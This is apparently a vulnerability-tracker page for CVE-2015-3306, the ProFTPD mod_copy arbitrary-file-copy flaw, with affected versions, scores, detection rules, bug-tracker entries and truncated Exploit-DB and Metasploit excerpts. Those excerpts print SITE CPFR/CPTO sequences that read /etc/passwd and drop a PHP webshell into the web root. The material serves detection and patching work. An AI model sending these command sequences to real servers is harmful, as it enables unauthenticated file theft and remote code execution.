CVE-2015-3306
published 2015-05-18CVE-2015-3306: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
PriorityP181critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
96.80%
99.9th percentile
The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | proftpd-dfsg | < proftpd-dfsg 1.3.5-2 (bookworm) | proftpd-dfsg 1.3.5-2 (bookworm) |
| debian | proftpd-dfsg | < proftpd-dfsg 1.3.6-6 (bookworm) | proftpd-dfsg 1.3.6-6 (bookworm) |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| proftpd | proftpd | <= 1.3.5b | — |
| proftpd | proftpd | — | — |
| siemens | simatic_cp_1543-1_firmware | >= 2.0 < 2.2 | 2.2 |
Detection & IOCsextracted from sources · hover to see the quote
commandSITE CPTO /tmp/.<random>
yara
words: ["Copy successful"]
- →Detect unauthenticated SITE CPFR / SITE CPTO FTP command sequences — the exploit chain requires no authentication and uses these two commands to stage and drop a PHP webshell. ↗
- →Alert on FTP sessions that issue SITE CPFR targeting /proc/self/cmdline or /proc/self/fd/3 — these are the specific proc paths used to smuggle a PHP payload. ↗
- →Alert on FTP sessions that issue SITE CPTO to web-accessible directories (e.g. /var/www) with a .php extension — this is the final step that enables HTTP-triggered RCE. ↗
- →Check FTP server response for '350' to SITE CPFR /etc/passwd as a vulnerability-check indicator — the Metasploit module uses this response to confirm exploitability. ↗
- →Monitor HTTP requests to randomly-named .php files in the web root immediately following an FTP session — the exploit executes the dropped payload via a GET request. ↗
- →Look for the string 'Copy successful' in FTP server responses as a network-level indicator that a SITE CPFR/CPTO operation completed successfully.
- ·Anonymous FTP access is disabled by default when installing ProFTPD via APT or YUM, but is ENABLED by default in source installs from proftpd.org — source-installed servers are exploitable without any credentials. ↗
- ·The mod_copy module (which contains the vulnerable SITE CPFR/CPTO commands) was not included in default ProFTPD installations until version 1.3.4 — earlier versions are not affected. ↗
- ·The ProFTPD service runs as 'nobody' by default, meaning copied files and executed payloads inherit those low privileges — but this is still sufficient for webshell deployment if the web directory is world-writable. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f989-xw5v-4w5p: An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1
ghsa_unreviewed·2022-05-24·CVSS 10.0
CVE-2019-12815 [CRITICAL] CWE-755 GHSA-f989-xw5v-4w5p: An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1
An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.
GHSA
GHSA-4mfj-5wr8-x32q: The mod_copy module in ProFTPD 1
ghsa_unreviewed·2022-05-13
CVE-2015-3306 [HIGH] CWE-284 GHSA-4mfj-5wr8-x32q: The mod_copy module in ProFTPD 1
The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
OSV
CVE-2019-12815: An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1
osv·2019-07-19·CVSS 10.0
CVE-2019-12815 [CRITICAL] CVE-2019-12815: An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1
An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.
OSV
CVE-2015-3306: The mod_copy module in ProFTPD 1
osv·2015-05-18·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306: The mod_copy module in ProFTPD 1
The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Debian
CVE-2019-12815: proftpd-dfsg - An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows ...
vendor_debian·2019·CVSS 10.0
CVE-2019-12815 [CRITICAL] CVE-2019-12815: proftpd-dfsg - An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows ...
An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.
Scope: local
bookworm: resolved (fixed in 1.3.6-6)
bullseye: resolved (fixed in 1.3.6-6)
forky: resolved (fixed in 1.3.6-6)
sid: resolved (fixed in 1.3.6-6)
trixie: resolved (fixed in 1.3.6-6)
Debian
CVE-2015-3306: proftpd-dfsg - The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write t...
vendor_debian·2015·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306: proftpd-dfsg - The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write t...
The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Scope: local
bookworm: resolved (fixed in 1.3.5-2)
bullseye: resolved (fixed in 1.3.5-2)
forky: resolved (fixed in 1.3.5-2)
sid: resolved (fixed in 1.3.5-2)
trixie: resolved (fixed in 1.3.5-2)
No detection rules found.
Exploit-DB
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
exploitdb·2021-05-26·CVSS 10.0
CVE-2015-3306 [CRITICAL] ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
---
# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
# Date: 25/05/2021
# Exploit Author: Shellbr3ak
# Version: 1.3.5
# Tested on: Ubuntu 16.04.6 LTS
# CVE : CVE-2015-3306
#!/usr/bin/env python3
import sys
import socket
import requests
def exploit(client, target):
client.connect((target,21)) # Connecting to the target server
banner = client.recv(74)
print(banner.decode())
client.send(b'site cpfr /etc/passwd\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto \r\n') # phpinfo() is just a PoC.
print(client.recv(1024).decode())
client.send(b'site cpfr /proc/self/fd/3\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto /var/www/html/test.php\r\n')
print(client.recv(1024).decode())
clien
Exploit-DB
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)
exploitdb·2015-06-10
CVE-2015-3306 ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'ProFTPD 1.3.5 Mod_Copy Command Execution',
'Description' => %q{
This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
Any unauthenticated client can leverage these commands to copy files from any
part of the filesystem to a chosen destination. The copy commands are executed with
the rights of the ProFTPD service, which by default runs under the privileges of the
'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
directory, PHP remote code execution is made possible.
},
'Author' =>
[
'Vadim Melihow', # Or
Exploit-DB
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution
exploitdb·2015-04-21
CVE-2015-3306 ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution
---
# Title: ProFTPd 1.3.5 Remote Command Execution
# Date : 20/04/2015
# Author: R-73eN
# Software: ProFTPd 1.3.5 with mod_copy
# Tested : Kali Linux 1.06
# CVE : 2015-3306
# Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(len(sys.argv) '
s.connect((server, 21))
s.recv(1024)
print '[ + ] Connected to server [ + ] \n'
s.send('sit
Exploit-DB
ProFTPd 1.3.5 - File Copy
exploitdb·2015-04-13
CVE-2015-3306 ProFTPd 1.3.5 - File Copy
ProFTPd 1.3.5 - File Copy
---
Description TJ Saunders 2015-04-07 16:35:03 UTC
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR pathname
214-CPTO pathname
214-UTIME YYYYMMDDhhmm[ss] path
214-SYMLINK source destination
214-RMDIR path
214-MKDIR path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site c
Metasploit
ProFTPD 1.3.5 Mod_Copy Command Execution
metasploit
ProFTPD 1.3.5 Mod_Copy Command Execution
ProFTPD 1.3.5 Mod_Copy Command Execution
This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.
Nuclei
ProFTPd - Remote Code Execution
nuclei·CVSS 10.0
CVE-2015-3306 [CRITICAL] ProFTPd - Remote Code Execution
ProFTPd - Remote Code Execution
ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Template:
id: CVE-2015-3306
info:
name: ProFTPd - Remote Code Execution
author: pdteam
severity: critical
description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code with the privileges of the ProFTPd process.
remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
reference:
- https://github.com/t0kx/exploit-CV
arXiv
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Response
arxiv_fulltext·2017-11-02
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Response
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Response
Zhen Huang0.25in
Mariana D'Angelo0.25in
Dhaval Miyani0.25in
David Lie
University of Toronto
\z.huang,mariana.dangelo,dhaval.miyani\@mail.utoronto.ca,[email protected]
## Abstract
There is often a considerable delay between the discovery of a vulnerability and the issue of a patch. One way to mitigate this window of vulnerability is to use a configuration workaround, which prevents the vulnerable code from being executed at the cost of some lost functionality -- but only if one is available. Since application configurations are not specifically designed to mitigate software vulnerabilities, we find that they only cover 25.2% of vulnerabilities.
To minimize patch delay vulnerabilities and address the lim
CTF
README
ctf_writeups·CVSS 9.8
[CRITICAL] README
# Boot to root CTFs
Walkthroughs and notes of 'boot to root' CTFs mostly from VulnHub that I did for fun. I like to use vulnerable VMs from VulnHub (in addition to the ones I create) to organize hands-on penetration testing training sessions for junior security auditors/consultants :-)
### >> Classic pentest methodology to do a Boot2root CTF upload a Webshell)
➤ Clear-text passwords stored in 'public' website pages, configuration files, log files
➤ ...
2. Exploiting unpatched known vulnerabilities
➤ Web server (e.g. Apache Struts RCE: CVE-2017-12611/CVE-2017-9805/CVE-2017-9791, JBoss Java Deserialization RCE)
➤ Bash & web server CGI (e.g. Shellshock RCE CVE-2014-6271/CVE-2014-7169)
➤ Web CMS (e.g. Drupalgeddon2 RCE CVE-2018-7600)
➤ Web framework (e.g. PHP CGI RCE CVE-2012-1823)
➤ FTP s
Bugzilla
CVE-2019-12815 proftpd: file copy vulnerability in mod_copy allows for remote code execution
bugzilla·2019-07-23·CVSS 10.0
CVE-2019-12815 [CRITICAL] CVE-2019-12815 proftpd: file copy vulnerability in mod_copy allows for remote code execution
CVE-2019-12815 proftpd: file copy vulnerability in mod_copy allows for remote code execution
An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to (is facilitated by) CVE-2015-3306.
Upstream Issue:
http://bugs.proftpd.org/show_bug.cgi?id=4372
Upstream Patch:
https://github.com/proftpd/proftpd/pull/816
Discussion:
Created proftpd tracking bugs for this issue:
Affects: epel-all [bug 1732367]
Affects: fedora-all [bug 1732366]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Bugzilla
CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [fedora-all]
bugzilla·2015-04-16·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [fedora-all]
CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects m
Bugzilla
CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy
bugzilla·2015-04-16·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy
CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:
http://bugs.proftpd.org/show_bug.cgi?id=4169
Upstream fix: https://github.com/proftpd/proftpd/pull/109
Discussion:
Created proftpd tracking bugs for this issue:
Affects: fedora-all [bug 1212388]
Affects: epel-all [bug 1212389]
---
proftpd-1.3.5-6.fc22 has been pushed to the Fedora 22 stable repository. If problems still persist, please make note of it in this bug report.
---
proftpd-1.3.4e-3.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note
Bugzilla
CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [epel-all]
bugzilla·2015-04-16·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [epel-all]
CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affect
Tenable
CVE-2019-12815: Improper Access Control Vulnerability in ProFTPD Disclosed
blogs_tenable·2019-07-23·CVSS 9.8
[CRITICAL] CVE-2019-12815: Improper Access Control Vulnerability in ProFTPD Disclosed
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2015-May/157581.htmlhttp://lists.opensuse.org/opensuse-updates/2015-06/msg00020.htmlhttp://packetstormsecurity.com/files/131505/ProFTPd-1.3.5-File-Copy.htmlhttp://packetstormsecurity.com/files/131555/ProFTPd-1.3.5-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/131567/ProFTPd-CPFR-CPTO-Proof-Of-Concept.htmlhttp://packetstormsecurity.com/files/132218/ProFTPD-1.3.5-Mod_Copy-Command-Execution.htmlhttp://packetstormsecurity.com/files/162777/ProFTPd-1.3.5-Remote-Command-Execution.htmlhttp://www.debian.org/security/2015/dsa-3263http://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_modcopy_exechttp://www.securityfocus.com/bid/74238https://www.exploit-db.com/exploits/36742/https://www.exploit-db.com/exploits/36803/http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2015-May/157581.htmlhttp://lists.opensuse.org/opensuse-updates/2015-06/msg00020.htmlhttp://packetstormsecurity.com/files/131505/ProFTPd-1.3.5-File-Copy.htmlhttp://packetstormsecurity.com/files/131555/ProFTPd-1.3.5-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/131567/ProFTPd-CPFR-CPTO-Proof-Of-Concept.htmlhttp://packetstormsecurity.com/files/132218/ProFTPD-1.3.5-Mod_Copy-Command-Execution.htmlhttp://packetstormsecurity.com/files/162777/ProFTPd-1.3.5-Remote-Command-Execution.htmlhttp://www.debian.org/security/2015/dsa-3263http://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_modcopy_exechttp://www.securityfocus.com/bid/74238https://www.exploit-db.com/exploits/36742/https://www.exploit-db.com/exploits/36803/
2015-05-18
Published